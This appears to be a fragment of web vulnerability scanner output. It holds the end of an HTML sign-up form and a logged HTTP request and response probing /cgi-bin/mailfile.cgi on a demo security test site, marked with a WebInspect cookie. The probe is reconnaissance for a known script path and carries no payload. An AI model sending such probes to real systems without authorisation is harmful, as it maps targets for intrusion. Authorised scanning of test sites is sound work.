<TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD 
bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /cgi-bin/mailfile.cgi HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Date: Thu, 04 Dec 2003 16:41:59 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Last-Modified: Mon, 16 Jul 2001 03:47:02 GMT ETag: "b4c3f1f8a9dc11:8f6" Content-Length: 12 MAILFILE.CGI